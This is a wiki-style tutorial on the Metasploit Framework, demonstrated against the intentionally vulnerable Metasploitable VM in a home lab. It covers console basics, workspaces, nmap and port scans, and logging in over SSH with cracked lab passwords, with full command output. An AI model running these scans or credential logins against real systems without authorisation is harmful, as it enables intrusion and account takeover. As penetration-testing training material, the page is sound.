MSF
From charlesreid1
Metasploit framework info: http://docs.kali.org/general-use/starting-metasploit-framework-in-kali
Also see Metasploitable for Metasploit in action!
Contents
Basics
Fire up metasploit:
$ msfconsole
Get some help:
msf> ?
Use a particular exploit:
msf> use some/particular/exploit
Show info about how to use the exploit:
msf> info msf> info some/particular/exploit
Set your variables:
msf> set RHOST 127.0.0.1
Run the exploit:
msf> run
Not-So-Basics
Initializing DB
First, you want postgresql to run as a server:
$ service postgresql start
This is the database format that MSF uses.
Now initialize the database:
$ msfdb init
Running
To get a metasploit console, run
$ msfconsole
Capturing Metasploit Console Output
If you want to capture the output you're seeing in Metasploit framework console, you can use the spool command.
spool /root/box/metasploitable/metasploit.log
If the spool command is not accessible, use the msfupdate command.
msf > spool /root/box/metasploitable/metasploit.log [*] Spooling to file /root/box/metasploitable/metasploit.log... msf >
To stop recording, set spool to off:
msf > spool off [*] Spooling is now disable msf >
Ninja
How to exploit hosts that aren't available remotely
Suppose you're not a client trying to exploit a server, but are a server trying to exploit a client.
What can you do?
Advanced
Creating Workspace
You can create a workspace to save scan information:
msf > db_status
[*] postgresql connected to msf
msf > workspace
* default
msf > workspace metasploitable
[-] Workspace not found: metasploitable
msf > workspace -a metasploitable
[*] Added workspace: metasploitable
msf > workspace
default
* metasploitable
msf > workspace -h
Usage:
workspace List workspaces
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r <old> <new> Rename workspace
workspace -h Show this help information
msf >
Reloading Workspace
You can reload a workspace by listing all workspaces, then type workspace [name]. Here, I reload the metasploitable workspace:
msf > db_status [*] postgresql connected to msf msf > workspace * default metasploitable msf > workspace metasploitable [*] Workspace: metasploitable msf >
Nmap Scan Into Workspace
Use db_nmap instead of nmap to store info in database:
msf > db_nmap -A -O -sS -sV 10.0.0.27 [*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:54 PDT [*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn [*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 1.68 seconds msf > db_nmap -A -O -sS -sV 10.0.0.27 [*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:55 PDT [*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn [*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 1.67 seconds msf > db_nmap -A -O -sS -sV 10.0.0.27 [*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:55 PDT [*] Nmap: Nmap scan report for 10.0.0.27 [*] Nmap: Host is up (0.0015s latency). [*] Nmap: Not shown: 977 closed ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 21/tcp open ftp vsftpd 2.3.4 [*] Nmap: |_ftp-anon: Anonymous FTP login allowed (FTP code 230) [*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) [*] Nmap: | ssh-hostkey: [*] Nmap: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) [*] Nmap: |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) [*] Nmap: 23/tcp open telnet Linux telnetd [*] Nmap: 25/tcp open smtp Postfix smtpd [*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, [*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX [*] Nmap: | Not valid before: 2010-03-17T14:07:45 [*] Nmap: |_Not valid after: 2010-04-16T14:07:45 [*] Nmap: |_ssl-date: 2016-03-25T23:42:57+00:00; -10h12m30s from scanner time. [*] Nmap: 53/tcp open domain ISC BIND 9.4.2 [*] Nmap: | dns-nsid: [*] Nmap: |_ bind.version: 9.4.2 [*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) [*] Nmap: |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 [*] Nmap: |_http-title: Metasploitable2 - Linux [*] Nmap: 111/tcp open rpcbind 2 (RPC #100000) [*] Nmap: | rpcinfo: [*] Nmap: | program version port/proto service [*] Nmap: | 100000 2 111/tcp rpcbind [*] Nmap: | 100000 2 111/udp rpcbind [*] Nmap: | 100003 2,3,4 2049/tcp nfs [*] Nmap: | 100003 2,3,4 2049/udp nfs [*] Nmap: | 100005 1,2,3 42714/tcp mountd [*] Nmap: | 100005 1,2,3 46675/udp mountd [*] Nmap: | 100021 1,3,4 33001/tcp nlockmgr [*] Nmap: | 100021 1,3,4 58755/udp nlockmgr [*] Nmap: | 100024 1 35518/udp status [*] Nmap: |_ 100024 1 46140/tcp status [*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) [*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) [*] Nmap: 512/tcp open exec netkit-rsh rexecd [*] Nmap: 513/tcp open login? [*] Nmap: 514/tcp open tcpwrapped [*] Nmap: 1099/tcp open java-rmi Java RMI Registry [*] Nmap: 1524/tcp open shell Metasploitable root shell [*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003) [*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1 [*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 [*] Nmap: | mysql-info: [*] Nmap: | Protocol: 53 [*] Nmap: | Version: .0.51a-3ubuntu5 [*] Nmap: | Thread ID: 10 [*] Nmap: | Capabilities flags: 43564 [*] Nmap: | Some Capabilities: Speaks41ProtocolNew, Support41Auth, SupportsTransactions, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression, ConnectWithDatabase [*] Nmap: | Status: Autocommit [*] Nmap: |_ Salt: [k*.G\v`^63:h~cRR'eM [*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 [*] Nmap: 5900/tcp open vnc VNC (protocol 3.3) [*] Nmap: | vnc-info: [*] Nmap: | Protocol version: 3.3 [*] Nmap: | Security types: [*] Nmap: |_ Unknown security type (33554432) [*] Nmap: 6000/tcp open X11 (access denied) [*] Nmap: 6667/tcp open irc Unreal ircd [*] Nmap: 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) [*] Nmap: |_ajp-methods: Failed to get a valid response for the OPTION request [*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 [*] Nmap: |_http-favicon: Apache Tomcat [*] Nmap: |_http-server-header: Apache-Coyote/1.1 [*] Nmap: |_http-title: Apache Tomcat/5.5 [*] Nmap: MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) [*] Nmap: Device type: general purpose [*] Nmap: Running: Linux 2.6.X [*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6 [*] Nmap: OS details: Linux 2.6.9 - 2.6.33 [*] Nmap: Network Distance: 1 hop [*] Nmap: Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel [*] Nmap: Host script results: [*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) [*] Nmap: | smb-os-discovery: [*] Nmap: | OS: Unix (Samba 3.0.20-Debian) [*] Nmap: | NetBIOS computer name: [*] Nmap: | Workgroup: WORKGROUP [*] Nmap: |_ System time: 2016-03-25T19:42:53-04:00 [*] Nmap: TRACEROUTE [*] Nmap: HOP RTT ADDRESS [*] Nmap: 1 1.47 ms 10.0.0.27 [*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 78.16 seconds
This information will be imported and parsed accordingly:
msf > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.0.0.27 08:00:27:47:98:ad Linux 2.6.X server msf >
Back Up Workspace
To back up a workspace, use db_export:
msf > db_export -h
dUsage:
db_export -f <format> [filename]
Format can be one of: xml, pwdump
[-] No output file was specified
msf > db_export -f xml /root/metasploitable.xml
[*] Starting export of workspace metasploitable to /root/metasploitable.xml [ xml ]...
[*] >> Starting export of report
[*] >> Starting export of hosts
[*] >> Starting export of events
[*] >> Starting export of services
[*] >> Starting export of web sites
[*] >> Starting export of web pages
[*] >> Starting export of web forms
[*] >> Starting export of web vulns
[*] >> Starting export of module details
[*] >> Finished export of report
[*] Finished export of workspace metasploitable to /root/metasploitable.xml [ xml ]...
msf >
Dealing With Hosts
The interface for using the hosts information is very powerful. We can use the -c switch to control what columns are shown:
msf > hosts -c address,os_name Hosts ===== address os_name ------- ------- 10.0.0.27 Linux msf >
We can also narrow down results (if we have a large number of hosts on a network) by searching for strings:
msf > hosts -c address,os_name -S linux Hosts ===== address os_name ------- ------- 10.0.0.27 Linux msf >
Passing Hosts to RHOST
If we have loaded a module, like auxiliary/scanner/portscan/tcp, we can use the hosts to define our scan targets with the -R flag when searching. (This can add multiple remote hosts to a scan - handy for long lists of hosts.)
It will also add the output of each scan/each module that is run to the database. Running a TCP scan will identify open ports, and each of those open ports will be added to the workspace/Metasploit database.
msf > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > show options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds msf auxiliary(tcp) > hosts -c address,os_name -S linux -R Hosts ===== address os_name ------- ------- 10.0.0.27 Linux RHOSTS => 10.0.0.27 msf auxiliary(tcp) > run [*] 10.0.0.27:22 - TCP OPEN [*] 10.0.0.27:23 - TCP OPEN [*] 10.0.0.27:21 - TCP OPEN [*] 10.0.0.27:25 - TCP OPEN [*] 10.0.0.27:53 - TCP OPEN [*] 10.0.0.27:80 - TCP OPEN [*] 10.0.0.27:111 - TCP OPEN [*] 10.0.0.27:139 - TCP OPEN [*] 10.0.0.27:445 - TCP OPEN [*] 10.0.0.27:514 - TCP OPEN [*] 10.0.0.27:513 - TCP OPEN [*] 10.0.0.27:512 - TCP OPEN [*] 10.0.0.27:1099 - TCP OPEN [*] 10.0.0.27:1524 - TCP OPEN [*] 10.0.0.27:2049 - TCP OPEN [*] 10.0.0.27:2121 - TCP OPEN [*] 10.0.0.27:3306 - TCP OPEN [*] 10.0.0.27:3632 - TCP OPEN [*] 10.0.0.27:5432 - TCP OPEN [*] 10.0.0.27:5900 - TCP OPEN [*] 10.0.0.27:6000 - TCP OPEN [*] 10.0.0.27:6667 - TCP OPEN [*] 10.0.0.27:6697 - TCP OPEN [*] 10.0.0.27:8009 - TCP OPEN [*] 10.0.0.27:8180 - TCP OPEN [*] 10.0.0.27:8787 - TCP OPEN [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) >
This process will create a deluge of packet traffic between the attacker (morpheus) and the target (metasploitable, 10.0.0.27), as shown by tcpdump:
# tcpdump -i eth0 [...] 03:35:33.494539 IP morpheus.38946 > 10.0.0.27.7745: Flags [S], seq 4229817845, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0 03:35:33.494905 IP morpheus.56392 > 10.0.0.27.7746: Flags [S], seq 2209661380, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0 03:35:33.494955 IP 10.0.0.27.7745 > morpheus.38946: Flags [R.], seq 0, ack 4229817846, win 0, length 0 03:35:33.495132 IP 10.0.0.27.7746 > morpheus.56392: Flags [R.], seq 0, ack 2209661381, win 0, length 0 03:35:33.495282 IP morpheus.44735 > 10.0.0.27.7747: Flags [S], seq 1306640419, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0 03:35:33.496069 IP 10.0.0.27.7747 > morpheus.44735: Flags [R.], seq 0, ack 1306640420, win 0, length 0 03:35:33.496090 IP morpheus.42604 > 10.0.0.27.7749: Flags [S], seq 1345082972, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0 03:35:33.496357 IP 10.0.0.27.7749 > morpheus.42604: Flags [R.], seq 0, ack 1345082973, win 0, length 0 03:35:33.708617 IP6 2601:602:8901:d335:bcd1:65ff:fe92:6371.48457 > ff05::c.1900: UDP, length 98 03:35:33.816292 IP6 2601:602:8901:d335:bcd1:65ff:fe92:6371.48457 > ff05::c.1900: UDP, length 98 03:35:33.833652 IP morpheus.46610 > 10.0.0.27.7753: Flags [S], seq 2211519157, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0 03:35:33.834214 IP morpheus.52147 > 10.0.0.27.7751: Flags [S], seq 2171151102, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0 03:35:33.834335 IP 10.0.0.27.7753 > morpheus.46610: Flags [R.], seq 0, ack 2211519158, win 0, length 0 03:35:33.834502 IP 10.0.0.27.7751 > morpheus.52147: Flags [R.], seq 0, ack 2171151103, win 0, length 0 03:35:33.834831 IP morpheus.43955 > 10.0.0.27.7752: Flags [S], seq 1337658889, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0 03:35:33.835315 IP 10.0.0.27.7752 > morpheus.43955: Flags [R.], seq 0, ack 1337658890, win 0, length 0 03:35:33.835404 IP morpheus.48124 > 10.0.0.27.7755: Flags [S], seq 2750644096, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0 03:35:33.835964 IP morpheus.41084 > 10.0.0.27.7756: Flags [S], seq 2965282008, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0 03:35:33.836016 IP 10.0.0.27.7755 > morpheus.48124: Flags [R.], seq 0, ack 2750644097, win 0, length 0 03:35:33.836268 IP 10.0.0.27.7756 > morpheus.41084: Flags [R.], seq 0, ack 2965282009, win 0, length 0 03:35:33.836544 IP morpheus.53623 > 10.0.0.27.7757: Flags [S], seq 1989216855, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0 03:35:33.836835 IP 10.0.0.27.7757 > morpheus.53623: Flags [R.], seq 0, ack 1989216856, win 0, length 0 03:35:33.837113 IP morpheus.34173 > 10.0.0.27.7758: Flags [S], seq 462052512, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0 03:35:33.837454 IP 10.0.0.27.7758 > morpheus.34173: Flags [R.], seq 0, ack 462052513, win 0, length 0 03:35:33.837707 IP morpheus.39847 > 10.0.0.27.7759: Flags [S], seq 4103494796, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0 03:35:33.837976 IP 10.0.0.27.7759 > morpheus.39847: Flags [R.], seq 0, ack 4103494797, win 0, length 0 03:35:33.838475 IP morpheus.51488 > 10.0.0.27.7760: Flags [S], seq 3689956999, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0 03:35:33.838757 IP 10.0.0.27.7760 > morpheus.51488: Flags [R.], seq 0, ack 3689957000, win 0, length 0 03:35:33.840901 IP morpheus.37018 > 10.0.0.27.7754: Flags [S], seq 2708295021, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0 03:35:33.841397 IP 10.0.0.27.7754 > morpheus.37018: Flags [R.], seq 0, ack 2708295022, win 0, length 0 03:35:33.926962 IP6 fe80::bcd1:65ff:fe92:6371.48457 > ff02::c.1900: UDP, length 98 03:35:34.034038 IP6 fe80::bcd1:65ff:fe92:6371.48457 > ff02::c.1900: UDP, length 98 03:35:34.149946 IP 10.0.0.1.55203 > 239.255.255.250.1900: UDP, length 104 03:35:34.166687 IP morpheus.59867 > 10.0.0.27.7763: Flags [S], seq 3464606117, win 29200, options [mss 1460,sackOK,TS val 67880524 ecr 0,nop,wscale 10], length 0 03:35:34.167308 IP 10.0.0.27.7763 > morpheus.59867: Flags [R.], seq 0, ack 3464606118, win 0, length 0
Services
Once we have done an Nmap and TCP scan, we know what services are running and what ports are open.
Show the services that are up with services -u:
msf auxiliary(tcp) > services -u Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 10.0.0.27 21 tcp ftp open vsftpd 2.3.4 10.0.0.27 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0 10.0.0.27 23 tcp telnet open Linux telnetd 10.0.0.27 25 tcp smtp open Postfix smtpd 10.0.0.27 53 tcp domain open ISC BIND 9.4.2 10.0.0.27 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2 10.0.0.27 111 tcp rpcbind open 2 RPC #100000 10.0.0.27 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP 10.0.0.27 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP 10.0.0.27 512 tcp exec open netkit-rsh rexecd 10.0.0.27 513 tcp login open 10.0.0.27 514 tcp tcpwrapped open 10.0.0.27 1099 tcp java-rmi open Java RMI Registry 10.0.0.27 1524 tcp shell open Metasploitable root shell 10.0.0.27 2049 tcp nfs open 2-4 RPC #100003 10.0.0.27 2121 tcp ftp open ProFTPD 1.3.1 10.0.0.27 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5 10.0.0.27 3632 tcp open 10.0.0.27 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7 10.0.0.27 5900 tcp vnc open VNC protocol 3.3 10.0.0.27 6000 tcp x11 open access denied 10.0.0.27 6667 tcp irc open Unreal ircd 10.0.0.27 6697 tcp open 10.0.0.27 8009 tcp ajp13 open Apache Jserv Protocol v1.3 10.0.0.27 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1 10.0.0.27 8787 tcp open msf auxiliary(tcp) >
Credentials
Like services, credentials are also accrued in the database.
msf > creds Credentials =========== host port user pass type active? ---- ---- ---- ---- ---- ------- [*] Found 0 credentials.
Once you find credentials, you can add them manually. We found credentials for 6 out of 7 users with John the Ripper (see Metasploitable/John Shadow File):
password (username) ----------------------------------- postgres (postgres) user (user) msfadmin (msfadmin) service (service) batman (sys) 123456789 (klog)
Add them by using the ssh_login module:
msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > show options msf auxiliary(ssh_login) > set RHOSTS 10.0.0.27 RHOSTS => 10.0.0.27 msf auxiliary(ssh_login) > set USERNAME msfadmin USERNAME => msfadmin msf auxiliary(ssh_login) > set PASSWORD msfadmin PASSWORD => msfadmin msf auxiliary(ssh_login) > run [*] 10.0.0.27:22 SSH - Starting bruteforce [+] 10.0.0.27:22 SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ' [*] Command shell session 1 opened (10.0.0.5:45812 -> 10.0.0.27:22) at 2016-03-26 17:23:11 -0700 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ssh_login) >
More Credentials
Run each of the other credentials we found. Everything goes ok, up until the last one, username klog
msf auxiliary(ssh_login) > set USERNAME user USERNAME => user msf auxiliary(ssh_login) > set PASSWORD user PASSWORD => user msf auxiliary(ssh_login) > run [*] 10.0.0.27:22 SSH - Starting bruteforce [+] 10.0.0.27:22 SSH - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ' [*] Command shell session 2 opened (10.0.0.5:50289 -> 10.0.0.27:22) at 2016-03-26 17:25:16 -0700 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ssh_login) > set USERNAME postgres USERNAME => postgres msf auxiliary(ssh_login) > set PASSWORD postgres PASSWORD => postgres msf auxiliary(ssh_login) > run [*] 10.0.0.27:22 SSH - Starting bruteforce [+] 10.0.0.27:22 SSH - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ' [*] Command shell session 3 opened (10.0.0.5:57606 -> 10.0.0.27:22) at 2016-03-26 17:25:25 -0700 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ssh_login) > set USERNAME service USERNAME => service msf auxiliary(ssh_login) > set PASSWORD service PASSWORD => service msf auxiliary(ssh_login) > run [*] 10.0.0.27:22 SSH - Starting bruteforce [+] 10.0.0.27:22 SSH - Success: 'service:service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ' [*] Command shell session 4 opened (10.0.0.5:52395 -> 10.0.0.27:22) at 2016-03-26 17:25:36 -0700 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ssh_login) > set USERNAME sys USERNAME => sys msf auxiliary(ssh_login) > set PASSWORD batman PASSWORD => batman msf auxiliary(ssh_login) > run [*] 10.0.0.27:22 SSH - Starting bruteforce [+] 10.0.0.27:22 SSH - Success: 'sys:batman' 'uid=3(sys) gid=3(sys) groups=3(sys) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ' [*] Command shell session 5 opened (10.0.0.5:34297 -> 10.0.0.27:22) at 2016-03-26 17:25:56 -0700 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ssh_login) > set USERNAME klog USERNAME => klog msf auxiliary(ssh_login) > set PASSWORD 123456789 PASSWORD => 123456789 msf auxiliary(ssh_login) > run [*] 10.0.0.27:22 SSH - Starting bruteforce [+] 10.0.0.27:22 SSH - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory ' [*] Command shell session 6 opened (10.0.0.5:47907 -> 10.0.0.27:22) at 2016-03-26 17:26:08 -0700 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed [*] 10.0.0.27 - Command shell session 6 closed. Reason: Died from EOFError msf auxiliary(ssh_login) >
That message tells us that the klog user doesn't have a home directory:
[+] 10.0.0.27:22 SSH - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory '
Seeing the Creds
Once you've got some creds:
msf auxiliary(ssh_login) > creds Credentials =========== host origin service public private realm private_type ---- ------ ------- ------ ------- ----- ------------ 10.0.0.27 10.0.0.27 22/tcp (ssh) msfadmin msfadmin Password 10.0.0.27 10.0.0.27 22/tcp (ssh) user user Password 10.0.0.27 10.0.0.27 22/tcp (ssh) postgres postgres Password 10.0.0.27 10.0.0.27 22/tcp (ssh) service service Password 10.0.0.27 10.0.0.27 22/tcp (ssh) sys batman Password 10.0.0.27 10.0.0.27 22/tcp (ssh) klog 123456789 Password
Next step is getting some loot.
Usage Example: Metasploitable Virtual Box
Main page for Metasploitable virtual box: Metasploitable
As an example of how we can use metasploit, we'll be looking at the Metasploitable virtual box.
Setting Up Metasploitable
Downloaded virtual disk image, loaded it up in a 64-bit Linux virtualbox instance.
The networking configuration was, I had the VirtualBox instance running on a Mac, and was attacking from a machine running Kali Linux. Both computers were on a private network and o n the same subnet.
From VirtualBox, I created a bridged network adapter (meaning, VirtualBox can send/receive messages directly through that interface). Next, I flipped the switch on the VirtualBox, and away we went. The router automatically assigned an IP address to the Metasploitable VirtualBox.
Recon
Let's take a few first steps in Metasploit, using the Metasploitable virtual box.
Make a record-keeping box for stuff:
$ mkdir -p box/metasploitable
Start by using nmap to scan the host.
First a fast scan -F:
$ nmap -F 10.0.0.*
Then we can do a more extensive scan:
$ nmap -sS 10.0.0.*
This reveals the IP address of the VirtualBox, which is 10.0.0.27.
We can also do a deeper scan:
$ nmap -sS -sV -A 10.0.0.27
This will reveal an array of services, some of which may be exploitable using metasploit.
Sure enough, the verbose scan returns lots of good information:
$ nmap -sS -sV -A 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT Nmap scan report for 10.0.0.27 Host is up (0.016s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2010-03-17T14:07:45 |_Not valid after: 2010-04-16T14:07:45 |_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time. 53/tcp open domain ISC BIND 9.4.2 | dns-nsid: |_ bind.version: 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 42810/tcp mountd | 100005 1,2,3 45599/udp mountd | 100021 1,3,4 34385/tcp nlockmgr | 100021 1,3,4 60702/udp nlockmgr | 100024 1 38085/udp status |_ 100024 1 52004/tcp status 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open java-rmi Java RMI Registry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 8 | Capabilities flags: 43564 | Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression | Status: Autocommit |_ Salt: w$K,8vk7k8tagd@PR*zK 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) | vnc-info: | Protocol version: 3.3 | Security types: |_ Unknown security type (33554432) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd | irc-info: | users: 1 | servers: 1 | lusers: 1 | lservers: 0 | server: irc.Metasploitable.LAN | version: Unreal3.2.8.1. irc.Metasploitable.LAN | uptime: 0 days, 1:05:20 | source ident: nmap | source host: 6D4CD63B.D3975B40.7B559A54.IP |_ error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/5.5 MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP |_ System time: 2016-03-22T21:31:31-04:00 TRACEROUTE HOP RTT ADDRESS 1 16.11 ms 10.0.0.27 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
MySQL
Let's focus on the MySQL service:
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 8 | Capabilities flags: 43564 | Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression | Status: Autocommit |_ Salt: w$K,8vk7k8tagd@PR*zK
We can brute-force MySQL, then use it to access files on the remote machine.
More info at Metasploitable/MySQL.
Wrapping Up and Moving On
After the nmap scan of the Metasploitable virtual box, we saw many services running, exposing this server's soft underbelly.
